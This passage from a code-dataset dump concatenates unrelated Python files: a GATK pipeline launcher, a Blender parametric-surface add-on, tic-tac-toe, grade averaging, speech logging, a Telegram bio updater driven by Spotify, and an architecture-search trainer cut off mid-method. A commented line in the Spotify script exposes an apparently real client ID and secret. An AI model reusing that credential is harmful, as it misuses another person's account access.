argparse.ArgumentParser(description=print(mytext),\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n requiredNAMED = parser.add_argument_group('required arguments')\n requiredNAMED.add_argument(\"-p\",\n required=True,\n default=argparse.SUPPRESS,\n dest=\"parentdir\",\n type=str,\n help=\"/path/to/directory/with/fastq.gz-files/\")\n parser.add_argument(\"-e\",\n required=False,\n dest=\"email\",\n help=\"the email address you would like to have notifications sent to\")\n parser.add_argument(\"-n\",\n default=None,\n nargs='+',\n required=False,\n dest=\"email_options\",\n help='''the type(s) of email notifications you would like to receive from the pipeline.\\\n Requires --email-address. These options are used to fill out the #SBATCH flags.\nmust be one (or multiple) of %s''' % [x for x in choices])\n parser.add_argument(\"-maf\",\n required=False,\n default='0.05',\n dest=\"maf\",\n help='''At the end of the pipeline, VCF files will be filtered for MAF. If the pipeline is run on a single population/pool, the user can set MAF to 0.0 so as to filter variants based on global allele frequency across populations/pools at a later time.''')\n parser.add_argument('-h', '--help',\n action='help',\n default=argparse.SUPPRESS,\n help='Show this help message and exit.\\n')\n args = parser.parse_args()\n if args.parentdir.endswith('/'):\n args.parentdir = args.parentdir[:-1]\n if args.email and args.email_options is None:\n print(Bcolors.FAIL + 'FAIL: --notification-types are required when specifying email' + Bcolors.ENDC)\n print(Bcolors.FAIL + 'FAIL: choices = {%s}\\n' % [x for x in choices] + Bcolors.ENDC)\n exit()\n if args.email_options and args.email is None:\n print(Bcolors.FAIL + 'FAIL: specifying --notification-types requires specifying \\\n--email-address\\n' + Bcolors.ENDC)\n exit()\n if args.email_options:\n for choice in args.email_options:\n if not choice.lower() in choices:\n print(Bcolors.FAIL +\n '''FAIL: There can be multiple options, but they must be from the set:''' +\n Bcolors.ENDC)\n print(Bcolors.FAIL +\n '''\\t%s\\n''' % choices +\n Bcolors.ENDC)\n exit()\n if args.email:\n if '@' not in args.email:\n print(Bcolors.FAIL + 'FAIL: email address does not have an \"@\" symbol in it, \\\nplease check input\\n' + Bcolors.ENDC)\n exit()\n if 'all' in args.email_options:\n args.email_options = ['all']\n # save email\n epkl = {'email': args.email,\n 'opts': args.email_options}\n pkldump(epkl, op.join(args.parentdir, 'email_opts.pkl'))\n\n pkldump(args.maf, op.join(args.parentdir, 'maf.pkl'))\n\n return args\n\n\ndef main():\n # parse arguments\n args = get_pars()\n\n # WARN if version = 3.6, FAIL if < 3.6\n check_pyversion()\n\n # look for exported vars (should be in /parentdir/bash_variables)\n check_reqs(args.parentdir)\n \n # determine which slurm accounts to use\n balance_queue.get_avail_accounts(args.parentdir, save=True)\n\n # read in the datatable\n data, f2pool, poolref = read_datatable(args.parentdir)\n\n# # create bedfiles to parallelize later on\n# create_bedfiles(poolref)\n\n # create directories for each group of pools to be combined\n pooldirs = make_pooldirs(data, args.parentdir)\n\n # assign fq files to pooldirs for visualization (good to double check)\n get_datafiles(args.parentdir, f2pool, data)\n\n # create and sbatch sh files\n create_sh(pooldirs, poolref, args.parentdir)\n \n print(Bcolors.BOLD +\n Bcolors.OKGREEN +\n \"\\nDone with 00_start-gatk_pipeline.py\" +\n Bcolors.ENDC)\n\n\nif __name__ == '__main__':\n mytext = Bcolors.BOLD + Bcolors.OKGREEN + '''\n*****************************************************************************\n\n\n ___| \\ | _ __|\n | _ \\ \\ __ | _ _ | _| _ \\\\ _ \\\\\n | ( | __| /_ \\ ( | ( | ( | | | __/ __/\n ___|\\___/ _/ _\\\\\\___/_|\\__/_| __/ | _| \\___|\\___|\n |\n |\n\n GATK pipeline\n\n*****************************************************************************\n\n\n''' + Bcolors.ENDC\n\n main()\n","repo_name":"CoAdapTree/gatk_pipeline","sub_path":"00_start-gatk_pipeline.py","file_name":"00_start-gatk_pipeline.py","file_ext":"py","file_size_in_byte":19099,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"41884135356","text":"import bpy\nimport bpy_extras\nfrom math import *\nimport mathutils\n\nbl_info = {\n \"name\": \"Parametric\",\n \"location\": \"View3D > Add > Mesh > Add a parametric surface\",\n \"category\": \"Add Mesh\",\n \"description\": \"Add a parametric surface\",\n \"author\": \"Wannes Malfait\",\n \"doc_url\": \"https://github.com/WannesMalfait/Blender-Add-ons/wiki/Users#parametric\",\n \"tracker_url\": \"https://github.com/WannesMalfait/Blender-Add-ons/issues\",\n \"version\": (1, 0),\n \"blender\": (2, 90, 0),\n}\n\n\nclass Parameters(bpy.types.PropertyGroup):\n \"\"\"Parameters for the Parametric surface\"\"\"\n Unum : bpy.props.IntProperty(\n name=\"Unum\",\n description=\"Number of u faces\",\n default=20,\n min=1,)\n Vnum : bpy.props.IntProperty(\n name=\"Vnum\",\n description=\"Number of v faces\",\n default=4,\n min=1,)\n u_from : bpy.props.FloatProperty(\n name=\"u from\",\n default = -pi,\n )\n v_from : bpy.props.FloatProperty(\n name=\"v from\",\n default = -0.5,\n )\n u_to : bpy.props.FloatProperty(\n name=\"u to\",\n default = pi,\n )\n v_to : bpy.props.FloatProperty(\n name=\"v to\",\n default = 0.5,\n )\n help_a : bpy.props.StringProperty(\n name= \"a\",\n default = \"2+v*cos(u/2)\",\n )\n help_b : bpy.props.StringProperty(\n name= \"b\",\n default = \"2\",\n )\n x_func : bpy.props.StringProperty(\n name=\"X \",\n default = \"a*cos(u)*b\",\n )\n y_func : bpy.props.StringProperty(\n name=\"Y \",\n default = \"a*sin(u)*b\",\n )\n z_func : bpy.props.StringProperty(\n name=\"Z \",\n default = \"v*sin(u/2)*b\",\n )\n \n Subdivision : bpy.props.IntProperty(\n name=\"Subdivision\",\n description=\"Subdivide the mesh (doesn't increase detail, 0 is no subdivision)\",\n min=0,\n max=6,\n default=0,\n step = 1)\n Smooth_Shading : bpy.props.BoolProperty(\n name=\"Smooth shading\",\n description=\"Set shading to smooth\")\n Merge_Doubles : bpy.props.BoolProperty(\n name=\"Merge Doubles\",\n description=\"Merge duplicated vertices\")\n\n\nclass MESH_OT_add_parametric(bpy.types.Operator, bpy_extras.object_utils.AddObjectHelper):\n \"\"\"Creates the Parametric surface\"\"\"\n bl_idname = \"mesh.add_parametric\"\n bl_label = \"Add a Parametric Surface\"\n bl_options = {'REGISTER', 'UNDO'}\n \n p: bpy.props.PointerProperty(type=Parameters)\n\n def execute(self, context):\n p = self.p\n # mesh arrays\n verts = []\n faces = []\n edges = []\n \n\n Unum = p.Unum\n Vnum = p.Vnum\n\n Uinc = (p.u_to-p.u_from)/Unum\n Vinc = (p.v_to-p.v_from)/Vnum\n \n # Compile the expressions before the loop starts\n a_code = compile(p.help_a, '', 'eval')\n b_code = compile(p.help_b, '', 'eval')\n x_code = compile(p.x_func, '', 'eval')\n y_code = compile(p.y_func, '', 'eval')\n z_code = compile(p.z_func, '', 'eval')\n \n # fill verts array\n u = p.u_from\n for i in range(0, Unum + 1):\n v = p.v_from\n # Superformula\n for j in range(0, Vnum + 1):\n a = eval(a_code)\n b = eval(b_code)\n x = eval(x_code)\n y = eval(y_code)\n z = eval(z_code)\n vert = (x, y, z)\n verts.append(vert)\n # increment phi\n v = v + Vinc\n # increment theta\n u = u + Uinc\n # fill faces array\n count = 0\n for i in range(0, (Vnum + 1) * (Unum)):\n if count < Vnum:\n A = i\n B = i+1\n C = (i+(Vnum+1))+1\n D = (i+(Vnum+1))\n\n face = (A, B, C, D)\n faces.append(face)\n\n count = count + 1\n else:\n count = 0\n\n # create mesh and object\n mymesh = bpy.data.meshes.new(\"Parametric\")\n\n # create mesh from python data\n mymesh.from_pydata(verts, edges, faces)\n mymesh.update(calc_edges=True)\n bpy_extras.object_utils.object_data_add(context, mymesh, operator=self)\n # test\n #go to editmode\n bpy.ops.object.editmode_toggle()\n\n\n # remove duplicate vertices\n if p.Merge_Doubles:\n bpy.ops.mesh.remove_doubles()\n\n # recalculate normals\n bpy.ops.mesh.normals_make_consistent(inside=False)\n #go back to objectmode\n bpy.ops.object.editmode_toggle()\n\n # Control the detail level\n if p.Subdivision != 0:\n bpy.ops.object.modifier_add(type='SUBSURF')\n bpy.context.object.modifiers[\"Subdivision\"].levels = p.Subdivision\n if p.Smooth_Shading:\n mypolys = mymesh.polygons\n for p in mypolys:\n p.use_smooth = True\n\n return {\"FINISHED\"}\n\n def draw(self, context):\n layout = self.layout\n col = layout.column(align=True)\n p = self.p\n col.label(text = \"Help variables\")\n col.prop(p, \"help_a\")\n col.prop(p, \"help_b\")\n col.label(text = \"Functions\")\n col.prop(p, \"x_func\")\n col.prop(p, \"y_func\")\n col.prop(p, \"z_func\")\n \n row = layout.row(align=True)\n row.label(text = \"Domain u\")\n row.prop(p, \"u_from\")\n row.prop(p, \"u_to\")\n row = layout.row(align=True)\n row.label(text = \"Domain v\")\n row.prop(p, \"v_from\")\n row.prop(p, \"v_to\")\n \n col = layout.column(align=True)\n # Control over the detail level\n col.label(text=\"Detail level:\")\n col.prop(p, \"Unum\")\n col.prop(p, \"Vnum\")\n col.prop(p, \"Subdivision\")\n col.prop(p, \"Smooth_Shading\")\n col.prop(p, \"Merge_Doubles\")\n\ndef addMenu(self, context):\n self.layout.operator(MESH_OT_add_parametric.bl_idname,\n text=\"Add Parametric\",\n icon=\"OUTLINER_OB_SURFACE\")\n\n\nclasses = (\n Parameters,\n MESH_OT_add_parametric,\n)\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n bpy.types.VIEW3D_MT_mesh_add.append(addMenu)\n \n\n\ndef unregister():\n for cls in classes:\n bpy.utils.unregister_class(cls)\n bpy.types.VIEW3D_MT_mesh_add.remove(addMenu)\n \n\nif __name__ == \"__main__\":\n register()\n","repo_name":"WannesMalfait/Blender-Add-ons","sub_path":"Parametric.py","file_name":"Parametric.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"54"} +{"seq_id":"42854832615","text":"import tensorflow as tf\n\nx = tf.Variable(3.0)\n\nwith tf.GradientTape() as tape:\n y = x ** 2 # y = x pow 2\n dy_dx = tape.gradient(y, x)\n dy_dx.numpy()\n print(dy_dx)\n\n# this may still take some time to discover the concepts of\n# AutoDiff\n# see https://en.wikipedia.org/wiki/Automatic_differentiation\n# and https://en.wikipedia.org/wiki/Backpropagation\n","repo_name":"amirrocker/ML-Training-Playground","sub_path":"NNFromScratch/tensorflow_guide/AutomaticDifferentiation.py","file_name":"AutomaticDifferentiation.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72246783522","text":"import numpy as np \nimport state\n\n'''\nclass Move(state.Move):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return \"Move at (%s, %s)\" % (self.x, self.y)\n'''\n\nclass Board(state.State):\n '''\n We denote X by 1, O by -1.\n '''\n\n def __init__(self):\n self.square = [[0 for x in range(3)] for y in range (3)]\n self.to_move = 1\n\n def move(self, move, to_move = None):\n if to_move == None:\n to_move = self.to_move\n\n if move[0] not in [0,1,2]:\n raise Exception(\"Invalid y value\")\n elif move[1] not in [0,1,2]:\n raise Exception(\"Invalid x value\")\n elif to_move not in [-1,1]:\n raise Exception(\"Invalid player\")\n elif self.square[move[0]][move[1]] != 0:\n raise Exception(\"Playing in an opcupied square\")\n else:\n self.square[move[0]][move[1]] = to_move\n self.to_move = -self.to_move\n return self\n\n def value(self):\n '''Determines whether the board has a winner. Returns:\n 1 if X wins\n -1 if O wins\n 0 if neither player wins\n Raises an exception if both players win'''\n X_win = False\n O_win = False\n for x in range(3):\n if self.square[x][0] == self.square[x][1] and self.square[x][1] == self.square[x][2] and self.square[x][0] in [-1,1]:\n if self.square[x][0] == 1:\n X_win = True\n else:\n O_win = True\n for y in range(3):\n if self.square[0][y] == self.square[1][y] and self.square[1][y] == self.square[2][y] and self.square[0][y] in [-1,1]:\n if self.square[0][y] == 1:\n X_win = True\n else:\n O_win = True\n if self.square[0][0] == self.square[1][1] and self.square[1][1] == self.square[2][2] and self.square[0][0] in [-1,1]:\n if self.square[0][0] == 1:\n X_win = True\n else:\n O_win = True\n if self.square[0][2] == self.square[1][1] and self.square[1][1] == self.square[2][0] and self.square[0][2] in [-1,1]:\n if self.square[0][2] == 1:\n X_win = True\n else:\n O_win = True\n if X_win and O_win:\n raise Error(\"Bad board\")\n elif X_win:\n return 1\n elif O_win:\n return -1\n else:\n return 0\n\n def is_end(self):\n if self.value() == 0:\n for x in range(3):\n for y in range(3):\n if self.square[x][y] == 0:\n return False\n return True\n else:\n return True\n\n def network_input(self):\n input = []\n for x in range(3):\n for y in range(3):\n if self.square[x][y] == 1:\n input += [[1], [0]]\n elif self.square[x][y] == -1:\n input += [[0], [1]]\n else:\n input += [[0], [0]]\n return np.array(input)\n\n def print_board(self):\n for x in range(3):\n output = \"\"\n for y in range(3):\n if self.square[x][y] == 1:\n output += \"X\"\n elif self.square[x][y] == -1:\n output += \"O\"\n else:\n output += \" \"\n if y < 2:\n output += \"|\"\n print(output)\n if x < 2:\n print(\"-----\")\n\n def valid_moves(self):\n move_list = []\n for x in range(3):\n for y in range(3):\n if self.square[x][y] == 0:\n move_list.append((x,y))\n return move_list\n\ndef print_policy(policy):\n for x in range(3):\n output = \"\"\n for y in range(3):\n if (x,y) in policy.keys():\n output += (\"%.2f\" % policy[(x,y)])\n else:\n output += \"0.00\"\n if y < 2:\n output += \"|\"\n print(output)\n if x < 2:\n print(\"--------------\")\n\n\nraw_move_list = [(0, 0), (0, 1), (0, 2), \\\n (1, 0), (1, 1), (1, 2), \\\n (2, 0), (2, 1), (2, 2)]\nmove_list = []\nfor (x, y) in raw_move_list:\n move_list.append((x, y))\n","repo_name":"JoeJBenton/machine-learning","sub_path":"AlphaZero/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28592624654","text":"# Programa para ler duas notas e calcular médias\n# Desafio 6 da aula 7\n\ndef medias(notas, testes, nota_corte):\n \"\"\"\n A média final é calculada somando todas as notas dentro da lista e dividido pela quantidade de testes definidos\n \"\"\"\n media_final = sum(notas) / testes\n\n # A resposta final ao usuário vai depender se a média final é menor que a nota de corte ou maior.\n if media_final < nota_corte:\n print(f'\\nA média {media_final:.2f} é mais baixa que a nota de corte. \\033[1mREPROVAÇÃO\\033[m')\n else:\n print(f'\\nA média {media_final:.2f} é maior que a nota de corte. \\033[1mAPROVAÇÃO\\033[m')\n\ndef main():\n\n testes = int(input('Quantas notas serão avaliadas na média? Mínimo de 2 notas: '))\n notas = [] # Uma lista vazia que vai receber os números das notas\n maxLengthList = testes # O tamanho máximo da lista vai ser a quantidade de avaliações que foi digitada\n\n nota_corte = float(input('Qual a nota mínima para aprovação? '))\n while len(notas) < maxLengthList:\n \"\"\" \n Enquanto o comprimento da lista 'notas' for menor que a quantidade de avaliações, \n a lista vai continuar recebendo valores\n \"\"\"\n num = float(input('Por favor, digite a nota (utilize ponto \".\" no lugar de vírgulas): '))\n notas.append(num)\n testes+1\n\n media = medias(notas,testes,nota_corte)\n\nmain()","repo_name":"Digitalen-Brasil/Python","sub_path":"Curso em Video/Mundo 1/Aulas/Desafios de aulas/Desafio 7 - Ler notas e média (aula7).py","file_name":"Desafio 7 - Ler notas e média (aula7).py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42751966952","text":"import speech_recognition as sr\r\n\r\ndef takeCommand():\r\n savefile=open('file.txt', 'a')\r\n r= sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold = 1\r\n audio = r.listen(source)\r\n \r\n try:\r\n print(\"Recognizing...\")\r\n query= r. recognize_google(audio, language='en-in') \r\n savefile.write(query)\r\n savefile.write(\" \")\r\n savefile.close()\r\n \r\n except Exception as e:\r\n print(e) \r\n print(\"say that again please\")\r\n return \"None\"\r\n return query\r\n \r\nif __name__ == \"__main__\":\r\n query=takeCommand().lower()\r\n ","repo_name":"manish17122000/Python-Basic-Project","sub_path":"Speak and save text.py","file_name":"Speak and save text.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37131838661","text":"\"\"\"\nhttps://www.interviewbit.com/old/problems/burn-a-tree/\nhttps://www.geeksforgeeks.org/burn-the-binary-tree-starting-from-the-target-node/\n\"\"\"\nimport sys\nsys.setrecursionlimit(10**4)\n \nclass Solution:\n \n def solve(self, A, B):\n\n def bottom_up(node, starting):\n if not node:\n return -1, False\n if node.val == starting:\n return 0, True\n\n time_left, burn_left = bottom_up(node.left, starting)\n time_right, burn_right = bottom_up(node.right, starting)\n burn = burn_left or burn_right\n\n if not burn:\n time = max(time_left, time_right)\n else:\n curr = time_left + time_right + 2\n if self.time < curr:\n self.time = curr\n time = time_left if burn_left else time_right\n return time + 1, burn\n\n self.time = 0\n bottom_up(A, B)\n return self.time\n","repo_name":"vishalshirke7/DSA","sub_path":"tree/binary_tree/burn-a-tree-from-leaf.py","file_name":"burn-a-tree-from-leaf.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6080533951","text":"#!/usr/bin/python\n\n\"\"\"\n\tLaunch all the plotting.Plotter class methods.\n\t\n\tThis script is supposed to act as a test for the plotting.Plotter\n\tclass.\n\t\n\"\"\"\n\nimport yahoo\nfrom plotting import Plotter\nimport market\nimport argparse\n\nLOCAL_DATASOURCE = \"yahoo.db3\"\nTEST_SYMBOL = \"ENI.MI\"\n\n\nif __name__=='__main__':\n\n\n\t## plotting ##\n\n\tsource = yahoo.LocalSource(LOCAL_DATASOURCE)\n\tsymbol = market.Symbol(source, TEST_SYMBOL, None, None, matplotlib=True)\n\t\n\tp = Plotter('Simple')\n\tp.draw_simple(symbol)\n\tp.run()\n\t\n\tp = Plotter('Candlestick')\n\tp.draw_candlestick(symbol)\n\tp.run()\n\t\n\tp = Plotter('Simple with volume')\n\tp.draw_simple_with_volume(symbol)\n\tp.run()\n\t\n\tp = Plotter('Simple with volume and OBV')\n\tp.draw_simple_with_volume_obv(symbol)\n\tp.run()\n\t\n\tp = Plotter('Moving averages')\n\tp.draw_moving_averages(symbol, [50, 20, 12])\n\tp.run()\n\t\n\tp = Plotter('Moving averages crossover')\n\tp.draw_moving_average_crossover(symbol, 50, 20)\n\tp.run()\n\t\n","repo_name":"anotherMe/pymta","sub_path":"plotting_test_all.py","file_name":"plotting_test_all.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74832343202","text":"#FULL PROJECT BY B_VOTSON FROM B_VOTSON TEAM\r\nisfirst = True\r\ntextname = \"Сейчас играет - \"\r\ntextauthor = \" .Автор: \"\r\ntimebefore = 3\r\nimport spotipy\r\nfrom spotipy.oauth2 import SpotifyOAuth\r\nfrom tkinter import *\r\nimport asyncio\r\nimport time\r\nfrom telethon.sync import TelegramClient\r\nfrom telethon.tl.functions.account import *\r\n\r\nimport threading\r\nison = True\r\nfrom idlelib.tooltip import Hovertip\r\n\r\n# Инициализация объекта Spotipy\r\n#sp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id='5c2fa33e816441f68e51540561e605ae', client_secret='9fd28d95c3af45e39bce47b1844eb89d', redirect_uri='http://bvotson.byethost7.com', scope='user-read-currently-playing'))\r\nsp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id='YOUR-SPOTIFY-CLIENT-ID', client_secret='YOUR-SPOTIFY-CLIENT-SECRET', redirect_uri='http://bvotson.byethost7.com', scope=\"user-read-currently-playing\"))\r\n# Получение информации о текущем треке\r\ncurrent_track = sp.current_user_playing_track()\r\n\r\nroot = Tk()\r\ndef updatesettings():\r\n global textname\r\n global textauthor\r\n global timebefore\r\n textname = e4.get()\r\n textauthor = e5.get()\r\n timebefore = e3.get()\r\n print(\"SAVED SETTINGS\")\r\ndef isonchange():\r\n global ison\r\n ison = not ison\r\n#Okno nahui===================\r\nl1 = Label(text='NRF StatusBar')\r\nl2 = Label(text=\"Наведитесь для полной информации\")\r\nHovertip(l2, '''\r\nСкрипт B_Votson Team для Telegram на Windows.\r\nКаждые n секунд скрипт вызывает окно с названием трека Spotify или любого другого плеера и обновляет информацию о нем в био.\r\n''', hover_delay=100)\r\nl3 = Label(text=\"Задержка обновления\")\r\ne3 = Entry()\r\nl4 = Label(text=\"Текст с указанием названия\")\r\ne4 = Entry()\r\nl5 = Label(text=\"Текст для указания автора\")\r\ne5 = Entry()\r\nbupdate = Button(text=\"Сохранить настройки\", command=updatesettings)\r\nbison = Button(text=\"Включить/Выключить\", command=isonchange)\r\nl1.pack()\r\nl2.pack()\r\nl3.pack()\r\ne3.pack()\r\nl4.pack()\r\ne4.pack()\r\nl5.pack()\r\ne5.pack()\r\nbupdate.pack()\r\nbison.pack()\r\n\r\n\r\n#=============================\r\n\r\n# Use your own values from my.telegram.org\r\napi_id = 123 #CHANGE FOR YOUR TELEGRAM APPLICATION\r\napi_hash = 'YOUR APPLICATION HASH'\r\nprint(\"Nerif Project Status Bar\")\r\n# The first parameter is the .session file name (absolute paths allowed)\r\ndef setabout(name, author):\r\n global isfirst\r\n global textauthor\r\n global textname\r\n with TelegramClient('BVTelegram', api_id, api_hash) as client:\r\n if isfirst:\r\n client.send_message('me', 'Было запущено приложение Nerif Project StatusBar Beta от B_Votson Team. Все права на скрипт принадлежат B_Votson Team. Сайт: http://bvotson.byethost7.com . Сайт проекта: nerifproject.22web.org. Удачного использования.')\r\n isfirst = False\r\n client(UpdateProfileRequest(\r\n about = textname + name + textauthor + author\r\n ))\r\ndef setstandart():\r\n with TelegramClient('BVTelegram', api_id, api_hash) as client:\r\n \r\n client(UpdateProfileRequest(\r\n about = \"\"\r\n ))\r\ndef loop1():\r\n while True:\r\n global ison\r\n loop = asyncio.new_event_loop()\r\n asyncio.set_event_loop(loop)\r\n while ison == True:\r\n global timebefore\r\n \r\n time.sleep(int(timebefore))\r\n if current_track is not None:\r\n name = current_track['item']['name']\r\n author = current_track['item']['artists'][0]['name']\r\n setabout(name, author) \r\n print(\"TRACKED\")\r\n \r\n setstandart()\r\n \r\n \r\n\r\n\r\n\r\n\r\nt = threading.Thread(target=loop1, args=())\r\nt.start()\r\nroot.mainloop()","repo_name":"BVotson/Nerif-StatusBar","sub_path":"nerifstatusbarforgit.py","file_name":"nerifstatusbarforgit.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73507508961","text":"import time\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom apex.fp16_utils import to_python_float\nfrom time import time\n\nfrom util import utils\nfrom surrogate import SurrogateLinear\n\n\nclass UNAS(object):\n def __init__(self, model, alpha, args, writer, logging):\n self.args = args\n self.model = model\n self.alpha = alpha\n self.logging = logging\n self.arch_optimizer = torch.optim.Adam(self.alpha.parameters(), lr=args.arch_learning_rate,\n weight_decay=args.arch_weight_decay)\n\n self.arch_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(\n self.arch_optimizer, float(args.epochs), eta_min=args.arch_learning_rate_min)\n\n self.latency_cost = args.target_latency > 0.\n self.target_latency = args.target_latency\n if self.latency_cost or self.args.meta_loss == 'relax':\n assert args.meta_loss in {'relax', 'rebar', 'reinforce'}, 'this is only implemented for rebar and reinforce'\n normal_size, reduce_size = self.alpha.module.alphas_size()\n alpha_size = normal_size + reduce_size\n self.surrogate = SurrogateLinear(alpha_size, self.logging).cuda()\n self.latency_pred_loss = utils.AverageMeter()\n self.latency_value = utils.AverageMeter()\n self.latency_coeff = args.latency_coeff\n self.latency_coeff_curr = None\n self.num_repeat = 10\n self.latency_batch_size = 24\n assert self.latency_batch_size <= args.batch_size\n self.num_arch_samples = 10000\n # print('***************** change the number of samples *******')\n # self.num_arch_samples = 200\n self.surrogate_not_train = True\n\n self.latency_actual = []\n self.latency_estimate = []\n\n # Extra layers, if any.\n self.meta_loss = args.meta_loss\n\n # weights generalization error\n self.gen_error_alpha = args.gen_error_alpha\n self.gen_error_alpha_lambda = args.gen_error_alpha_lambda\n\n # Get the meta learning criterion.\n if self.meta_loss in ['default', 'rebar', 'reinforce']:\n self.criterion = nn.CrossEntropyLoss(reduction='none')\n self.criterion = self.criterion.cuda()\n\n if self.meta_loss == 'reinforce':\n self.exp_avg1 = utils.ExpMovingAvgrageMeter()\n self.exp_avg2 = utils.ExpMovingAvgrageMeter()\n\n self.alpha_loss = args.alpha_loss\n\n # Housekeeping.\n self.loss = None\n self.accuracy = None\n self.count = None\n self.loss_diff_sign = None\n self.reset_counter()\n self.report_freq = args.report_freq\n self.writer = writer\n\n def reset_counter(self):\n \"\"\"Resets counters.\"\"\"\n self.count = 0\n self.loss = utils.AverageMeter()\n self.accuracy = utils.AverageMeter()\n self.loss_diff_sign = utils.AverageMeter()\n if self.latency_cost:\n self.latency_pred_loss = utils.AverageMeter()\n self.latency_value = utils.AverageMeter()\n\n if self.meta_loss == 'relax':\n self.relax_pred_loss = utils.AverageMeter()\n\n def mean_accuracy(self):\n \"\"\"Return mean accuracy.\"\"\"\n return self.accuracy.avg\n\n def compute_latency(self, train_batch, discrete_weight):\n discrete_indices = self.model.module.get_indices(discrete_weight)\n self.model.eval()\n train_batch = train_batch[:self.latency_batch_size]\n elapsed_time = np.zeros(self.num_repeat)\n with torch.no_grad():\n for i in range(self.num_repeat):\n torch.cuda.synchronize()\n start = time()\n tmp = self.model.module.fast_forward(train_batch, discrete_indices)\n torch.cuda.synchronize()\n end = time()\n elapsed_time[i] = (end - start)\n\n self.model.train()\n return np.median(elapsed_time) * 1000\n\n def train_surrogate(self, train_batch):\n # measure\n self.logging.info('collecting latency samples')\n past_alphas = []\n past_target = []\n\n for i in range(self.num_arch_samples):\n with torch.no_grad():\n weights = self.alpha(1)\n disc_weights = self.alpha.module.discretize(weights)\n latency = self.compute_latency(train_batch, disc_weights)\n alphas = self.alpha.module.get_arch_sample(disc_weights)\n past_alphas.append(alphas.cpu())\n past_target.append(torch.FloatTensor([latency]))\n if i % 100 == 0:\n self.logging.info('collected %d samples' % i)\n\n all_alphas = torch.cat(past_alphas, dim=0)\n all_target = torch.cat(past_target, dim=0)\n\n num_train = int(0.8 * self.num_arch_samples)\n test_alphas = all_alphas[num_train:]\n test_target = all_target[num_train:]\n train_alphas = all_alphas[:num_train]\n train_target = all_target[:num_train]\n\n self.surrogate.learn(train_alphas, train_target, test_alphas, test_target)\n self.surrogate.eval()\n self.surrogate_not_train = False\n\n def training_obj(self, train, train_target, weights, model_opt, val, val_target, global_step):\n if not self.gen_error_alpha:\n logits = self.model(train, weights)\n loss = self.criterion(logits, train_target)\n accuracy = utils.accuracy(logits, train_target)[0]\n loss1, loss2 = loss, torch.zeros_like(loss)\n else:\n logits_train = self.model(train, weights)\n loss_train = self.criterion(logits_train, train_target)\n\n logits_val = self.model(val, weights)\n loss_val = self.criterion(logits_val, val_target)\n\n loss2 = torch.abs(loss_val - loss_train)\n self.loss_diff_sign.update(torch.mean(((loss_val - loss_train) > 0).float()).data)\n loss1 = loss_train\n loss = loss1 + self.gen_error_alpha_lambda * loss2\n accuracy = utils.accuracy(logits_train, train_target)[0]\n\n if self.alpha_loss:\n alpha_loss = self.alpha.module.alpha_loss(weights)\n loss += self.args.alpha_loss_lambda * alpha_loss\n\n if self.count % self.report_freq == 0:\n self.writer.add_scalar(\n 'meta/alpha_loss', torch.mean(alpha_loss), global_step)\n\n return loss, accuracy, loss1, loss2\n\n def step(self, input_valid, target_valid, global_step, weights, input_valid2=None, target_valid2=None, model_opt=None):\n \"\"\"Optimizer for the architecture params.\"\"\"\n self.arch_optimizer.zero_grad()\n if self.meta_loss == 'default':\n loss, accuracy, loss1, loss2 = self.training_obj(input_valid, target_valid, weights, model_opt,\n input_valid2, target_valid2, global_step)\n loss, loss1, loss2 = torch.mean(loss), torch.mean(loss1), torch.mean(loss2)\n elif self.meta_loss == 'rebar':\n # compute loss with discrete weights\n with torch.no_grad():\n disc_weights = {\n 'normal': weights['dis_normal'], 'reduce': weights['dis_reduce']}\n\n loss_disc, accuracy, loss1, loss2 = self.training_obj(input_valid, target_valid, disc_weights,\n model_opt, input_valid2, target_valid2, global_step)\n\n # compute baseline\n loss_cont, _, _, _ = self.training_obj(input_valid, target_valid, weights,\n model_opt, input_valid2, target_valid2, global_step)\n\n reward = (loss_disc - loss_cont).detach()\n log_q_d = self.alpha.module.log_prob(weights)\n loss = torch.mean(log_q_d * reward) + torch.mean(loss_cont)\n loss1, loss2 = torch.mean(loss1), torch.mean(loss2)\n\n if self.latency_cost:\n # train the surrogate function initially.\n if self.surrogate_not_train:\n self.train_surrogate(input_valid)\n\n # sample a single architecture sample\n weight_lat = self.alpha(1)\n disc_weights_lat = {'normal': weight_lat['dis_normal'], 'reduce': weight_lat['dis_reduce']}\n\n # compute latency for the discrete weights.\n elapsed_time = self.compute_latency(input_valid, disc_weights_lat)\n # latency prediction for continuous weights\n self.surrogate.eval()\n alphas = self.alpha.module.get_arch_sample(weight_lat)\n latency_cont = self.surrogate(alphas)\n # latency prediction for discrete weights\n alphas = self.alpha.module.get_arch_sample(disc_weights_lat)\n latency_discrete = self.surrogate(alphas)\n surrogate_loss = torch.mean(torch.abs(elapsed_time - latency_discrete.squeeze(1)))\n\n self.latency_coeff_curr = self.latency_coeff * max(min(global_step / self.args.latency_iter, 1.0), 0.)\n 